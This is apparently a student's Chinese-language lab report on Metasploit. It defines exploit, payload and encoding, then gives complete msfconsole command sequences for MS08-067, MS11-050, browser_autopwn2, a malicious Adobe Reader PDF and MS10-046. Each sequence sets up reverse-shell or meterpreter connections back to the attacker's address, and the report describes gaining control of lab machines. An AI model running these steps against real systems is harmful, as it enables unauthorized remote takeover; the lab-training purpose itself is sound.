Exp5：MSF基础应用

一、基础问题回答

（1）用自己的话解释什么是 exploit , payload , encode.

exploit：设相当于利用漏洞偷偷打开的管道，将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件，或者包装成指定的类型，然后通过管道传输进去后开始为我们控制靶机服务。

encode: 针对payload进行编码，就是对它进行包装打扮，改变payload代码特征，但是不改变payload为我们所用的特征，但能对payload进行加工。

二、实践过程

1.Windows服务渗透攻击——MS08-067安全漏洞
- 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：
  
  msf > use exploit/windows/smb/ms08_067_netapi
  
  msf exploit(ms08_067_netapi) > show payloads
  
  msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
  
  msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip
  
  msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口
  
  msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip，特定漏洞端口已经固定
  
  msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型，匹配度较高
  
  msf exploit(ms08_067_netapi) > exploit //攻击
- 此时需要关闭靶机的防火墙，不然会出现ConnectionTimeOut的失败；
- 攻击成功后的结果：
2.浏览器渗透攻击——MS11-050
- 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：
msf > use windows/browser/ms11_050_mshtml_cobjectelement

msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

msf exploit(ms11_050_cobjectelement) > exploit
测试无法成功，总是会出现IE浏览器的错误，我觉得问题是出在浏览器版本不对，不适合那个漏洞，既然如此，那就换个漏洞呗，下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
- ** 实施browser_autopwn模块 **
  - 现在攻击机里进入msfconsole，然后分别输入
    
    use auxiliary/server/browser_autopwn2
    
    set SRVHOST 192.168.43.161
    
    set URIPATH auto
    
    show options
  - 开始攻击，此时可以看到msf在不停的尝试不同的payload
  - 尝试成功，输出了可被访问的URL http：//192.168.43.161:8080/auto并启动服务器；
  - 在靶机浏览器上输入URL后，浏览器跳转到 http：//192.168.43.161:8080/auto/FaOGsp上
  - 回头看一下kali机，发现回连成功了，输入session -i 2获取对话，此时，已经获得了靶机的控制权。
3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
- 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：
msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击
- 将生成的pdf文件拷贝到靶机上。
- 在kali上输入back退出当前模块，进入监听模块，输入以下命令：
msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

msf exploit(handler) > set LPORT 5213 //攻击端口固定

msf exploit(handler) > exploit
- 在靶机上打开5213lzm.pdf文件：
- 攻击机显示攻击成功：
4.快捷方式图标漏洞——MS10-046
- 在攻击机kali输入msfconsole进入控制台，依次输入以下指令：
  
  msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  
  msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip
  
  msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
  
  msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip
  
  msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击
  - 此时弹出一个攻击者IP的目录，其中有一个“快捷方式”的图标：
  - 对于已建立好了会话，通过命令sessions查看，并选择sessions -i 1，获得靶机控制权。
    
    （PS）本次试验时间上跨度有点大，没能连贯的做完，第四个项任务是在ciscn结束之后做的，而此时的kali机已被折腾崩了，所以考了别人的虚拟机，继续做完了，这里的IP不是之前那个。